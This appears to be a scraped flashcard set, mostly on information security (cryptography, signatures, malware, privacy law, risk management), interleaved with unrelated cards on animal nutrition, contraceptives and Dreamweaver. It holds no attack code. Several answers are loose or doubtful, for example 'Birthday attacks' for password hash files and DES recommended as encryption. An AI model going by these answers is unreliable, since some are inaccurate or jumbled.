[9.4] Alice wants to send a message and an associated digital signature to Bob. Alice has a public key K_(Apub) and the associated private key K_(Apriv). Similarly, Bob has a public key and associated private key. Explain the cryptographic steps necessary for Alice to generate her digital signature and for Bob to verify Alice's digital signature using hashing.
Alice's signature generation: i. Alice prepares message M (hashes the message). ii. Alice inputs the hashed message and Alice's private key to the signature creation algorithm to obtain SigA(M). iii. Alice sends SigA(M) and M to Bob. Bob performing signature verification: i. Bob receives message M and claimed signature SigA(M). ii. Bob hashes message M to obtain M'. iii. Bob inputs SigA(M), M' and Alice's public key into the signature verification algorithm. iv. If output = Yes then SigA(M) is the signature on message M formed by Alice; if the hash function is collision resistant then it is highly likely the message is the same as the one sent by Alice. If output = No, then there is no assurance that the signature on the message was formed by Alice or that the hash was right.
[9.4] Alice wants to send a message and an associated digital signature to Bob. Alice has a public key K_(Apub) and the associated private key K_(Apriv). Similarly, Bob has a public key and associated private key. Explain the cryptographic steps necessary for Alice to generate her digital signature.
Alice's signature generation: i. Alice prepares message M (may include encoding the message). ii. Alice inputs the message and Alice's private key to the signature creation algorithm to obtain SigA(M). iii. Alice sends SigA(M) and M to Bob.
Digital Certificate
Also called an SSL certificate, is a type of electronic business card that is attached to internet transaction data to verify the sender of data
[9.6] Ransomware such as CryptoLocker uses encryption to encrypt the files on a victim's computer, then demands that they pay a ransom to be able to decrypt their files. According to the "Takedown and recovery of files" section, investigators were able to take over the control servers of CryptoLocker and shut them down. How were users able to decrypt their files after that?
An IT security firm gained access to the database of RSA private keys that the CryptoLocker operators had stored, and made available a tool to help victims decrypt their files. (Note that this decryption service is no longer in operation.) For each file to be encrypted, one would generate a random AES key, encrypt the file using AES, encrypt the AES key using the RSA public key, and then delete the AES key. This would be much faster since the user's files are being encrypted using the faster AES encryption algorithm. Users would still be unable to decrypt their files since the AES key has been deleted and the only way to recover the AES key is to decrypt it using the RSA private key.
Bot Herder
An attacker who controls a botnet.
Intrusions
An attempt to gain unauthorised access to your system
Trojan Horse
An executable program that is advertised as performing one activity but which actually performs malicious activity.
Information Security Event
An identified occurrence of a system, service or network state indicating a possible breach of information security policy or failure of safeguards, or a previously unknown situation that may be security relevant.
Zombie
An infected computer that is under the remote control of an attacker.
Cryptanalysis
Analysis of cryptographic systems, inputs and outputs to derive confidential information, usually without using secret knowledge.
Biochemical Basis
Animals have Δ-4, Δ-5, Δ-6 and Δ-9 desaturase enzymes. Stearate to oleate = Δ-9 desaturase. Cats lack Δ-6 desaturase. To make linoleic acid (18:2 Δ9,12), need Δ-12 desaturase; to make linolenic acid (18:3 Δ9,12,15), need Δ-12 and Δ-15 desaturase.
Essential fatty acids conversion
Animals can insert double bonds after carbon #4-9 and they can add 2-carbon units. - Stearic can be made into oleic. - Linoleic can be made into arachidonic. - Cannot convert oleic to linoleic or linolenic. - Fatty acids always stay in the same family (omega-3 or omega-6).
Worms
Another type of self-replicating malware is the worm; like a virus it is designed to make copies of itself. - Unlike a virus, a worm is a standalone application. - Worms spread through network connections, accessing uninfected machines and then hijacking their resources to transmit yet more copies across the network. Worms were invented as a curiosity and have even been suggested as ways of testing networks or distributing software patches across a network. - Even the most 'benign' worm consumes resources and can affect the performance of a computer system.
How is a botnet created?
Botnets are created using malware that gives an attacker control over a group of computers; attackers commonly use them to gather information from the computers (e.g., usernames and passwords). Botnets spread through viruses and worms.
[9.3] Alice wants to send a confidential message to Bob. They do not have an existing shared secret key. Suppose that Alice and Bob agree to use an asymmetric cipher (RSA). Bob has a public key K_(Bpub) and the associated private key K(Bpriv). What should Bob do with each of these keys to permit people to send confidential messages to him?
Bob should keep his private key K_(Bpriv) secret and make his public key K_(Bpub) public.
Benefits of CLA:
Anti-carcinogenic Anti-obesity Anti-atherogenic Immunomodulatory
Protecting Fat From Oxidative Damage
Antioxidants added to feed to protect against oxidative damage to lipids. Natural antioxidants (work in vivo): Vitamin E, Vitamin A, citric acid, ascorbic acid. Feed antioxidants (added to the feed or fat): Ethoxyquin (Santoquin), BHA (butylated hydroxyanisole), BHT (butylated hydroxytoluene), TBHQ (tertiary butylated hydroquinone).
Risk ____ defines the quantity and nature of risk that organizations are willing to accept as they evaluate the tradeoffs between perfect security and unlimited accessibility.
Appetite
Important actions of Eicosanoids
Arachidonic -> eicosanoids; conversion blocked by aspirin, Tylenol, NSAIDs etc. Eicosanoids: inhibit gastric acid secretion; involved in inflammation, pain, body temperature; blood pressure, blood clotting; cause smooth muscle contraction (Lutalyse F2a: induce parturition in sows; synchronize estrous in cattle, horses).
RELATIONSHIP OF CRUDE FIBER TO ENERGY LEVEL (TDN) IN FEED
As Crude Fiber or ADF increases, TDN Decreases
Certificate
Assertion by a trusted third party that a particular public key belongs to a particular entity.
You can assess the relative risk for each of the vulnerabilities by a process called risk ____________________.
Assessment
____________________ are defined as information and the systems that use, store, and transmit information.
Assets
Which is better for key distribution: Symmetric or Asymmetric ciphers?
Asymmetric ciphers. Anyone may know the public key and everyone has their own private key whereas there is only one shared key for symmetric ciphers.
Man-in-the-Middle Attack (MITM)
Attacker positions self between two entities.
Phishing
Attempts to gain credentials to enable access to other resources by masquerading as a legitimate organisation. Usually involves spoofing and social engineering.
[1.4] What is the full name of the organization known as AusCERT?
Australian Computer Emergency Response Team.
[6.1] Which organisations does the Australian Privacy Act 1988 apply to?
Australian Federal government agencies and ACT government agencies
Malware
Automated attacks designed to exploit common vulnerabilities
Cost ____________________ is the process of preventing the financial impact of an incident by implementing a control.
Avoidance
What criteria must the key of a Vernam OTP meet?
Must be: 1. TRULY Random 2. Same length as message 3. Used only once
Botnet is used for what?
Botnets are primarily used to launch attacks against other computers - flood the internet with spam messages - commit fraud against advertisers, and - perform so-called distributed denial of service attacks on companies and governments.
Omega-3 vs Omega-6
Both are polyunsaturated. - Omega-6 is high in corn and soy oil. - Omega-3 is high in flax (18:3) and fish oil (EPA and DHA). - Omega-3 are made into eicosanoids that are less inflammatory. - Omega-3 are needed for brain development. - Typical ω-6/ω-3 ratio in our diet is greater than 10; should be less than 3.
Cipherspec message
Client must send it to the server; the server must return it to the client. On receipt by the client, the previously agreed ciphers and keys are used from then on.
Clock-based tokens
Clock time used as input algorithm. Token and Host clock must be synced.
What does Credential Replay look like?
Cybercriminals hope to access a few accounts by using a large cache of stolen login credentials to access a firm's online accounts.
How do you insert a background image into a web page?
Background images are specified in the CSS style sheet. Choose your selector in the CSS designer panel and go to the background properties. There, you will be able to click the folder for the background-image property.
Which of the following is NOT designed to prevent individuals from entering sensitive areas but instead is intended to direct traffic flow?
Barricade
A(n) ____________________ is a "value or profile of a performance metric against which changes in the performance metric can be usefully compared."
Baseline
HTTP authentication methods
Basic: browser sends username+password using base64 encoding; security through obscurity. Digest: hashes credentials with MD5; hashes the password, URI and timestamp. MD5 is a poor hash, vulnerable to dictionary attacks.
____________________ is the process of seeking out and studying the practices used in other organizations that produce results you would like to duplicate in your organization.
Benchmarking
What is an alternative to using the Vernam OTP?
Binary additive stream ciphers that don't use TRULY random binary sequence and instead use KEYSTREAM GENERATOR.
Which password attack is typically used specifically against password files that contain cryptographic hashes?
Birthday attacks
[9.4] Alice wants to send a message and an associated digital signature to Bob. Alice has a public key K_(Apub) and the associated private key K_(Apriv). Similarly, Bob has a public key and associated private key. Explain the cryptographic steps necessary for Bob to verify Alice's digital signature.
Bob performing signature verification: i. Bob receives message M and claimed signature SigA(M). ii. Bob inputs SigA(M), M and Alice's public key into signature verification algorithm. iii. If output = Yes then SigA(M) = signature on message M formed by Alice. If output = No, then no assurance that the signature on the message was formed by Alice.
Would you use Vernam OTP to ensure C,I or A?
Confidentiality. - attacker can try all possible keystreams to recover all possible plaintext but has no way to know which is correct.
[3.4] An organization sells their used photocopier at auction without first removing the stored data from the hard drive. Which information security goal will potentially be breached if this data is exposed?
Breach of confidentiality. The original assets are presumably retained by the company. The material on the hard drive is a copy of the originals, but if exposed the information is no longer confidential.
Nuke: Teardrop Attack
Breaks messages into fragments, then sends packet fragments that can't be reconstructed. The target cannot rebuild the messages, panics and dies.
Tom is the IT manager for an organization that experienced a server failure that affected a single business function. What type of plan should guide the organization's recovery effort?
Business Continuity Plan (BCP)
Of the three types of mitigation plans, the _________________________ plan is the most strategic and long term.
Business Continuity or BC
Which of the following is not a characteristic of an alarmed carrier PDS?
Periodic visual inspections
biometric device
authenticates person's identity using personal characteristic... fingerprint, face
access controls
authentication and authorization
preventive control
avoid an incident from occurring
C-R token systems
Challenge Response systems. - User request access - System sends challenge - User types challenge in device - User sends display response to host
A(n) ____________________ desk policy requires that employees secure all information in appropriate storage containers at the end of each day.
Clean
Overriding an employee's security ____________________ requires that the need-to-know standard be met.
Clearance
[7.1] Explain how SSH provides server-to-client authentication and client-to-server authentication.
Client authentication: - Public keys, harder to guess - Can associate several keys with single account/computers.
The formal decision making process used when considering the economic feasibility of implementing information security controls and safeguards is called a(n) ____.
CBA
Cross-site request forgery
CSRF is an attack that tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf.
_______________ can be used to secure a mobile device.
Cable lock
CSS
Cascading Style Sheets
Measures of Fat Quality
Chain length: saponification number, fatty acid profile. Unsaturation: melting point, titer, hardness (also influenced by chain length), iodine value, fatty acid profile (P/S, U/S ratio). Stability: peroxide value, TBARS (measure of rancidity). Moisture, impurities, unsaponifiables (MIU). Free fatty acid level.
[5.4] Compare the two token-based methods (clock based or counter based). What is a possible advantage of each compared with the other?
Clock-based tokens do not require interaction with the host before authentication takes place. Challenged-based tokens do not require a synchronized clock.
Role
Collection of procedures or jobs that the subject performs.
Multi-factor authentication
Combines multiple authenticator categories
Who is the Commonwealth Privacy Act 1988 applied to?
Commonwealth and ACT government agencies
[1.2] Which information asset was targeted when researchers attacked Jeep Cherokee?
Communications between the cellular network, the car, the entertainment system software and the other control systems for the vehicle.
Uses of RC4
Communications: - SSL/TLS for internet traffic - Wireless networks - IEEE 802.11 Wired Equivalent Privacy (WEP) - IEEE 802.11i WiFi Protected Access (WPA & WPA2)
Logic Bomb
Computer code that lies dormant until it is triggered by a specific logic event.
Internet
Computer network with information and communication facilities of interconnected networks using standardized communication protocols
In order to recover or prevent worm attacks:
Computer with proper password policy Current security update Antivirus or security software Secured shares are protected from infections
Who is Cracker?
Computer-savvy programmer creates attack software
Energy: Outline
Concept in nutrition. Partitioning or distribution. Species differences. Energy density. Predicting the requirement: body weight, growth, temperature/activity effects. Effect of energy on feed intake. Feed efficiency. Regulation of feed intake.
In the U.S. military classification scheme, ____ data is any information or material the unauthorized disclosure of which reasonably could be expected to cause damage to the national security.
Confidential
Security policy - goals/objectives
Confidentiality
Cryptography is used for which CIA?
Confidentiality Integrity Authenticity
[3.6] Employee finds USB in foyer and accesses it. Outline likely threats.
Content is potentially malicious.
Risk ____ is the application of controls to reduce the risks to an organization's data and information systems.
Control
Access control
Controlling or restricting the use of information assets and/or resources.
Alert message
Conveys TLS-related alerts to the other party. Two levels: Warning - notifies the other party that the connection may be unstable. Fatal - notifies the other party of an unrecoverable error or compromise in security.
What is phishing.
Cybercriminals pretend to be a trustworthy source in order to acquire sensitive personal information such as usernames, passwords, date of birth, passport details, and credit card details.
Major risk is a combined function of (1) a threat less the effect of threat-reducing safeguards, (2) a vulnerability less the effect of vulnerability reducing safeguards, and (3) an asset less the effect of asset value-reducing safeguards.
False
Metrics-based measures are generally less focused on numbers and more strategic than process-based measures.
False
There are individuals who search trash and recycling — a practice known as ____ — to retrieve information that could embarrass a company or compromise information security.
Dumpster Diving
Mutually exclusive means that all information assets must fit in the list somewhere.
False
Once the organizational threats have been identified, an assets identification process is undertaken.
False
Barry discovers that an attacker is running an access point in a building adjacent to his company. The access point is broadcasting the security set identifier (SSID) of an open network owned by the coffee shop in his lobby. Which type of attack is likely taking place?
Evil twin
A single loss ____________________ is the calculation of the value associated with the most likely loss from an attack.
Expectancy
One problem with benchmarking is that there are many organizations that are identical.
False
"If you realize you do not know the enemy, you will gain an advantage in every battle." (Sun Tzu)
False
A best practice proposed for a small home office setting is appropriate to help design control strategies for a multinational company.
False
A dictionary password attack is a type of attack in which one person, program, or computer disguises itself as another person, program, or computer to gain access to some resource.
False
A phishing attack "poisons" a domain name on a domain name server.
False
A rootkit uses a directed broadcast to create a flood of network traffic for the victim computer.
False
Program-specific policies address the specific implementations or applications of which users should be aware.
False
A security policy is a comparison of the security controls you have in place and the controls you need in order to address all identified threats.
False
A(n) disaster recovery plan dictates the actions an organization can and perhaps should take while an incident is in progress.
False
ALE determines whether or not a particular control alternative is worth its cost.
False
An attacker uses exploit software when wardialing.
False
Protocols are activities performed within the organization to improve security.
False
Authorization controls include biometric devices.
False
CBAs cannot be calculated after controls have been functioning for a time.
False
Comprehensive means that an information asset should fit in only one category.
False
Qualitative-based measures are comparisons based on numerical standards, such as numbers of successful attacks.
False
Continuity of critical business functions and operations is the first priority in a well-balanced business continuity plan (BCP).
False
Each of the threats faced by an organization must be examined to assess its potential to endanger the organization and this examination is known as a threat profile.
False
Eliminating a threat is an impossible proposition.
False
Every organization should have the collective will and budget to manage every threat by applying controls.
False
Identifying human resources, documentation, and data information assets of an organization is less difficult than identifying hardware and software assets.
False
If every vulnerability identified in the organization is handled through mitigation, it may reflect an inability to conduct proactive security activities and an apathetic approach to security in general.
False
In information security, benchmarking is the comparison of security activities and events against the organization's future performance.
False
Information security managers and technicians are the creators of information.
False
Internal benchmarking can provide the foundation for baselining.
False
Criminals
Create & sell bots -> generate spam Sell credit card numbers, etc...
Non-repudiation
Create evidence that action has occurred, so user cannot falsely deny the action later.
Webpage spoofing
Creating a fake webpage that looks like the page for a legitimate business to trick users.
Hybrid Cryptosystems
Cryptosystems can be combined: 1. Use an asymmetric cipher to provide confidentiality for a particular short message: a randomly chosen shared secret key. 2. The symmetric cipher uses the shared secret key for encrypting the bulk data.
Human vulnerabilities
Cyber security training including social engineering, passwords, best practices, etc. We are vulnerable because our information technology is fragile and susceptible to a wide range of threats including: - Natural disasters. - Structural failures. - Cyber attacks. - Human errors. - Human attitude. - Technology failures. - Complex interactions. - Financial constraints. - Lack of expertise. - Out of control technologies and environments.
Know yourself means identifying, examining, and understanding the threats facing the organization.
False
Likelihood risk is the risk to the information asset that remains even after the application of controls.
False
Many corporations use a ____ to help secure the confidentiality and integrity of information.
Data Classification Scheme
Which item in a Bring Your Own Device (BYOD) policy helps resolve intellectual property issues that may arise as the result of business use of personal devices?
Data ownership
Information assets
Data, device or component that supports information related activities. Need to be protected from illicit access, use, disclosure, alteration, destruction and theft.
Which of these is not a state of data that DLP examines?
Data-In process
[9.3] Alice wants to send a confidential message to Bob. They do not have an existing shared secret key. Suppose that Alice and Bob agree to use an asymmetric cipher (RSA). Bob has a public key K_(Bpub) and the associated private key K(Bpriv). Outline the set of steps that Bob must follow to decrypt the ciphertext received from Alice.
Decrypt: 1. Receive ciphertext C 2. Decrypt ciphertext using agreed asymmetric cipher decryption algorithm (RSA) and the key K_(Bpriv) to recover message M where M=D(C, K_(Bpriv)) 3. Decode message (if necessary)
The ____ strategy attempts to prevent the exploitation of the vulnerability.
Defend Control
Denial of Service attacks (DoS)
Denies authorised users access to the system. UDP Flood, TCP SYN Flood, ICMP Flood, Smurf IP attack. Nuke Attack: tie the computer up.
[CRYPTO] What type of measure if implemented to ensure message maintains integrity?
Detective. You can't prevent it being altered but can check if it has been.
Bomb Calorimeter
Determination of Gross energy of a feed, ingredient, fecal sample. Principle: a known amount of sample is combusted in the reaction chamber and the resulting heat (as measured by the increase in the temperature in the water bath) is determined. 1 kcal = 1000 calories. 1 gram carbohydrate = 4 kcal; 1 gram lipid = 9 kcal; 1 gram protein = 5-6 kcal; 1 gram ethanol = 7 kcal
Energy Partitioning
Determination of Gross, Digestible, Metabolizable Energy is relatively simple -Analyze Feed, feces and urine. Determination of heat increment, heat production and components of net energy is more difficult.
Which is the first step in securing an operating system?
Develop security policy
Which is the first step in securing an operating system?
Develop the security policy
Shodan
Device search engines. Permits searching by IP address, open port, Active protocol, Vulnerability number
Energy Distribution, Partitioning, Utilization Metabolizable Energy (ME)
Digestible Energy (DE). Metabolizable Energy (ME) = digestible E - (urinary + gas energy). Urinary energy: breakdown products of metabolism (urea). Gas energy: methane, hydrogen; used in ruminants, ignored in non-ruminants. Corn: DE = 3,451 kcal/kg (as fed); ME = 3,395 kcal/kg
Energy Distribution, Partitioning, Utilization Net Energy
Digestible Energy (DE). Metabolizable Energy (ME). Net Energy (NE) = metabolizable E - heat increment. Heat increment = heat production associated with nutrient digestion and metabolism and the heat of fermentation. Heat increment is heat that is wasted or lost to the environment, but may also contribute to body temperature. Corn: ME = 3,395 kcal/kg; NE = 2,672 kcal/kg
Due ____________________ is the demonstration that the organization is diligent in ensuring that the implemented standards continue to provide the required level of protection.
Diligence
The concept of competitive ____ refers to falling behind the competition.
Disadvantage
The practice is similar to eavesdropping but is not limited to gaining access to data
Disclosure or snooping
Management of classified data includes its storage and ____.
Distribution, Destruction, and Portability
[6.1] According to Section 6 of the Australian Privacy Act 1988, what does 'record' mean?
Document or database or photograph or other pictorial representation of a person.
a. in-band key exchange
Elliptic Curve Diffie-Hellman (ECDH) is an example of ______________. a. in-band key exchange b. out-of-band key exchange c. SHA-1 key management d. AES key certification
Security countermeasures/mechanisms
Encrypt data • Use DES encryption
[9.3] Alice wants to send a confidential message to Bob. They do not have an existing shared secret key. Suppose that Alice and Bob agree to use an asymmetric cipher (RSA). Bob has a public key K_(Bpub) and the associated private key K_(Bpriv). Outline the set of steps that Alice must follow to encrypt a message to send to Bob.
Encrypt: 1. Prepare message M - may include coding it as an integer 2. Encrypt message using agreed asymmetric cipher encryption algorithm (RSA) and the key K_(Bpub) to produce ciphertext C where C=E(M,K_(Bpub)) 3. Transmit ciphertext C to Bob
Ciphertext (C)
Encrypted plaintext, transformed so the message is now 'hidden'
Caesar Cipher
Encryption = step forward n places in the alphabet. Decryption = step back n places in the alphabet. Secret key = n
Asymmetric Cryptography (Public Key)
Encryption and Decryption Keys are DIFFERENT. and disclosing one does not compromise the other.
Symmetric Cryptography (Secret Key)
Encryption and Decryption Keys are the SAME. Key (K) must be kept secret = has to be distributed or stored securely. Threat of confidentiality breach of key.
Symmetric Cipher (Secret Key Cipher)
Encryption key IS THE SAME AS decryption key (or one key can be easily deduced from the other)
Example of Preventative controls
Encryption of files
Is energy an essential nutrient?
Energy can come from CHO, AA or Fat. -CHO free diet ? -Fat free diet ? -Protein free diet? 25 lb pig -Eating 1.0 kg feed (corn / soy diet with 20% CP) -Gaining 0.5 kg per day
Availability
Ensure resources ACCESSIBLE when required by authorized user.
TCP (Transmission Control Protocol)
Ensure what sent arrives reliably and in order.
Penetration
Entering the system using information discovered up till now
Identification
Entity requesting access presents an identifier to the system
Recent security breaches
Equifax (2017) Wannacry (2017) Yahoo (2016, 2014, 2013)
XSS countermeasures
Escape untrusted data. validate output
Energy
Essential nutrient •Sources: CHO, lipid, protein •Definition: -ability to do work •Measured in terms of heat production
Transport layer
Establishes basic data channels for applications. Uses ports to distinguish between different applications on the same host.
HTTP security
Exposed to interception, no encryption. Poor integrated security.
[6.2] What was the purpose of amending (National Privacy Principles) the Aust. Privacy Act 1988?
Extend coverage of the Privacy Act to the private sector (with some exemptions)
All information that has been approved by management for public release has a(n) ____________________ classification.
External
A(n) ____ is an authorization issued by an organization for the repair, modification, or update of a piece of equipment.
FCO
Which type of attack involves the creation of some deception in order to trick unsuspecting users?
Fabrication
Which one of the following is an example of a direct cost that might result from a business disruption?
Facility repair
Operational ____________________ analysis examines user acceptance and support, management acceptance and support, and the overall requirements of the organization's stakeholders.
Feasibility
List the privacy legislation in Australia
Federal - Commonwealth Privacy Act 1988 - Privacy Amendment (Private Sector) Act 2000 - Privacy Amendment (Enhancing Privacy Protection) Act 2012 State - Information Privacy Act 2009 (QLD)
Energy Utilization
Feed (gross energy) -fecal = Digestible Energy (DE) -Urinary (and gas) energy = Metabolizable (ME) -heat increment = Net energy (NE) -maintenance + production NEm + NEp
Energy Distribution, Partitioning, Utilization Digestible Energy
Feed = gross energy. Feces = fecal energy. Digestible Energy (DE) = Feed energy - fecal energy. DE can be used to describe the diet or ingredients in the diet. Corn: GE = 3,933 kcal/kg (as fed); DE = 3,451 kcal/kg
FTP
File Transfer Protocol
The military uses a ____-level classification scheme.
Five
Reconnaissance
Footprint, Scan and Enumerate. Aim is to find attack vectors
Why is access control important
Fundamental aspect of information security because unauthorised access to resources, or authorised users misusing resources, can compromise CIA (Confidentiality, Integrity, Availability).
The difference between an organization's measures and those of others is often referred to as a performance ____________________.
Gap
The ____ security policy is an executive-level document that outlines the organization's approach and attitude towards information security and relates the strategic value of information security within the organization.
General
Health Issues Related to Fatty Acid Chemistry
General: -Fat has 2.25x the calories of CHO or protein Saturated Fat: -Animal fats, hydrogenated plant oils -Solids at room temperature -Tend to raise serum cholesterol Unsaturated Fats: -Plant oils, fish oil -Liquids at room temperature -Tend to lower serum cholesterol -Type of unsaturated is important •Monounsaturated (olive oil) •Trans fat •Omega-3 vs omega-6
Heats of Combustion for Various Nutrients
Glucose 3.74 Sucrose 3.94 Starch 4.18 Cellulose 4.18 Butter 9.1 Corn oil 9.4 Palmitate 9.4 Average Protein 5.65 Casein 5.90 Glycine 3.11 Tyrosine 5.90 Urea 2.52 Ethanol 7.11
Link Layer
Governs communication between adjacent nodes in a network. Knows how to pass a message to a MAC address
______ allows for a single configuration to be set and then deployed to many or all users.
Group policy
______________ allows for a single configuration to be sent and then deployed to many or all users.
Group policy
[5.2] List four basic properties of hash functions.
H1: The message can be any length but the hash value is always a fixed length. H2: H(M) is one-way - you can compute the hash value from the input message but you can't compute the input message from the hash value. H3: H(M) is collision resistant - it's hard to find distinct messages with the same hash value. H4: A small change in the message produces a large change in the hash value.
[4.1] Resource Owners
Have responsibility for the resource objects, control them, give access privileges and implement access control mechanisms.
Heat Increment
Heat increment is highest for fiber (fermentation heat) Lowest for fat.
[5.8] Can you think of an example where it is more important that the false match rate must be very low?
High security where critical only authorized user allowed. Better to lock out authorized than allow unauthorized.
Gap time
How long between each key press
Dwell time
How long each key is pressed on keyboard
Behavior Control Firewall Technique
How services are used. Limits web. Filters spam.
Daily Energy Intake
Human: 2500 (2000-3000) kcal/day Pigs: -Typical diet = 3200-3400 kcal/kg -Growing pigs: 10 Mcal/d (3 kg feed/d) -Lactating sow: 20-40 Mcal/d (6-12 kg feed/d) Horse: -13-20 Mcal/d -Forage (1.8-2.1 kcal/kg) + Concentrate (3.0-3.4 Mcal/kg)
Essential Fatty Acid Requirements
Humans: -Some references indicate Linoleic Acid and Linolenic are essential -Others include arachidonic acid -Some may also include EPA and DHA -Elongation/desaturation limited in infants (add ARA, DHA to formula) Primates: -DHA shown to be essential for nervous tissue and retina Cats: -Linoleic acid relieves many symptoms of EFA deficiency -Arachidonic acid needed to normalize reproduction in female cats -Diet should contain 0.5% Linoleic acid and 0.02% Arachidonic Horses: -There are no reports of EFA deficiencies -Recommend 0.5% Linoleic Acid Poultry: -No established requirements for Linolenic Ruminants: -No direct measures of EFA requirements in ruminants -Evidence suggests that typical diets are adequate
HTML
Hypertext Markup Language
HTTP
Hypertext Transfer Protocol
Firewall Limitations
IP spoofing, each app needs special treatment, outside machines need to know about gateway, can't blacklist everything. Communication vs Security
The actions an organization can and perhaps should take while an incident is in progress should be specified in a document called the ____ plan.
IR
b. Alice's public key
If Bob wants to send a secure message to Alice using an asymmetric cryptographic algorithm, which key does he use to encrypt the message? a. Alice's private key b. Alice's public key c. Bob's public key d. Bob's private key
FIN Scanning
If port is in LISTEN, no reply. If port is closed, responds with reset.
How many keys are required in asymmetric cryptography?
If there are n participants then you need a total of n key pairs.
Fatty Acid Profile
In non-ruminants, the tissue fatty acid profile reflects the diet the animal was fed. It is possible to significantly modify the type of fatty acid by changing diet.
Ciphers used for confidentiality
In storage: Microsoft's Encrypting File System, BitLocker Being transmitted: SSL/TLS, IPSec, WEP, WPA Processing: Crypto not good for hiding information when it is being processed.
[5.8] How can you reduce FMR?
Increase threshold.
Breach of Availability
Information assets are not accessible when required by an authorised entity.
Breach of Integrity
Information assets have been modified or destroyed by unauthorised entity.
Breach of Confidentiality
Information is disclosed to unauthorised entities.
[6.1] According to Section 6 of the Australian Privacy Act 1988, what does 'personal information' mean?
Information or an opinion, whether true or not, and whether recorded in material form or not, about an individual whose identity is apparent, or can reasonably be ascertained from information or opinion.
[6.1] What sort of privacy is the Australian Privacy Act 1988 concerned with?
Information or data privacy.
[6.1] According to Section 6 of the Australian Privacy Act 1988, what does 'sensitive information' mean?
Information or opinion about an individual's: - racial/ethnic origin - political opinion/membership - religion - philosophical beliefs - membership of trade union/professional assoc. - sexual preference - criminal record - health info - genetic info
Oral Contraceptives are Steroid Hormones
It is estimated that 11 million women in the US take oral contraceptives. Types: -Combination •Estrogen + Progestin (levonorgestrel or norethindrone) -Progestin only -Levonorgestrel: •Dose is 100-250 μg/day or 30 μg/day depending on type •binding affinities at human steroid hormone receptors are: 323% that of progesterone at the progesterone receptor, 58% that of testosterone at the androgen receptor, 17% that of aldosterone at the mineralocorticoid receptor, 7.5% that of cortisol at the glucocorticoid receptor, and <0.02% that of estradiol at the estrogen receptor. -Ethinyl estrogen 20-100 μg/day. It would take the equivalent of 10,000 quarter pound burgers to provide the same dose per day.
[9.6] Ransomware such as CryptoLocker uses encryption to encrypt the files on a victim's computer, then demands that they pay a ransom to be able to decrypt their files. It is likely that CryptoLocker used hybrid encryption. Explain how it may have done so and why.
It is likely CryptoLocker used RSA and AES together in a hybrid encryption, since RSA public key encryption is much slower than symmetric ciphers.
What is an ste file used for?
It is used to quickly open your site without having to specify your local site folder and remote publishing information each time you open DreamWeaver
Which statement about a man trap is true?
It monitors and controls two interlocking doors to a room
Which statement about mantrap is true?
It monitors and controls two interlocking doors to a room
Why would you not use Vernam OTP?
Key Management. - Same keystream is required to encrypt and decrypt and you can't reuse keys. Must be able to distribute and store key securely. If you can do this securely you may as well send/store the original message securely.
Is key distribution an issue for asymmetric cryptography?
Key distribution is not an issue. Anyone may know the public key and everyone has their own private key.
Which of the following is NOT a Microsoft Windows setting that can be configured through a security template?
Keyboard Mapping
Which of the following is not a Microsoft Windows setting that can be configured through a security template?
Keyboard mapping
The residential lock most often used for keeping out intruders is the _______________.
Keyed entry lock
[5.3] Which property of cryptographic hash functions is required in order for S/KEY to be secure?
Knowing any one-time password does not give away the next one-time password. The next password when hashed gives the current password. Hash function must satisfy the one-way property (difficulty inverting them).
Internet bot
Also known as web robots; automated internet applications controlled by software agents. § These bots interact with network services intended for people, carrying out monotonous tasks and behaving in a humanlike manner (i.e., computer game bot) § Bots can gather information, reply to queries, provide entertainment, and serve commercial purposes. § Botnet - a network of "zombie" computers used to do automated tasks such as spamming or reversing spamming
[3.4] Is disposing of the used photocopier considered a threat, vulnerability or an attack?
Leaves organisation vulnerable. Threat that unauthorized person can access data. If they gain access then confidentiality breached and security incident occurs. Lack of knowledge and failure in policy of asset disposal = vulnerabilities.
____________________ is the probability that a specific vulnerability within an organization will be successfully attacked.
Likelihood
Essential Fatty Acids Linoleic and a-linolenic
Linoleic (ω-6) = C 18:2 Δ 9,12 -Can be made into Arachidonic •(ω-6)= C 20:4 Δ 5, 8,11, 14 α-Linolenic (ω-3)= C18:3 Δ 9, 12,15 -Can be made into: •EPA* (ω-3) 20:5 Δ5, 8, 11,14,17 •DHA* (ω-3) 22:6 Δ4, 7, 10, 13,16,19
Nomenclature
Linoleic Acid: CH3(CH2)4CH=CHCH2CH=CH(CH2)7COOH Delta: Δ (18:2 Δ 9,12) -count from carboxyl end Omega: ω (18:2 ω-6) or "n" (18:2 n-6) -count from methyl end Ex: Oleic Acid= C 18:1 cis-9, Δ-9, or ω -9
Conjugated Linoleic Acid
Linoleic acid (18:2, cis-9, cis-12) is an essential fatty acid and has a methylene-interrupted arrangement of double bonds (unconjugated). C9=C10-CH2-C12=C13- CLA is a mixture of positional (8/10, 9/11, 10/12, 11/13) and geometric (cis/trans, trans/cis, c/c, t/t) isomers of linoleic acid with double bonds in a conjugated diene arrangement. -CH2-C9=C10-C11=C12-C13-CH2-
Logic Bombs
Logic Bomb: Malware logic executes upon certain conditions. The program is often used for otherwise legitimate reasons. Examples: • Software which malfunctions if maintenance fee is not paid. • Employee triggers a database erase when he is fired.
Which type of denial of service attack exploits the existence of software flaws to disrupt a service?
Logic attack
____ addresses are sometimes called electronic serial numbers or hardware addresses.
MAC
MITM Fabrication
MITM creates information and sends it claiming to be someone else.
MITM Modification
MITM modifies the information then sends it.
Classes of Nutrients
Macronutrients: -Water -Carbohydrates (energy) -Lipids (energy) -Proteins / Amino Acids (energy) Micronutrients: -Minerals -Vitamins
Computer Virus
Malicious computer code that, like its biological counterpart, reproduces itself on the same computer.
Malware
Malicious software deliberately designed to breach security of computer based information systems. Can affect CIA depending on payload action.
How does Malware work?
Malicious software is created to damage/disable computer systems, steal data, or gain unauthorized access to networks or computing resources.
What's the impact of Malware?
Malware can delete files or directory information, or it may allow attackers to covertly gather personal data, including financial information, and usernames and passwords.
Polymorphic Malware
Malware code that completely changes from its original form whenever it is executed.
How does Malware happen?
Malware may be installed on a computer when a user clicks an unsafe link, opens an infected file, or visits a legitimate website that could contain adware/malware.
Oligomorphic Malware
Malware that changes its internal code to one of a set number of predefined mutations whenever it is executed.
Ransomware
Malware that encrypts a user's computer files and demands a payment to permit decryption, e.g. the Breaking Bad computer ransomware demanded $1000 to decrypt the files it infects.
Ransomware
Malware that prevents a user's device from properly operating until a fee is paid.
Metamorphic Malware
Malware that rewrites its own code and thus appears different each time it is executed.
Network vulnerabilities
Man in the middle attacks, Router attacks, Ethernet traffic sniffing, DNS attacks
Spoofing
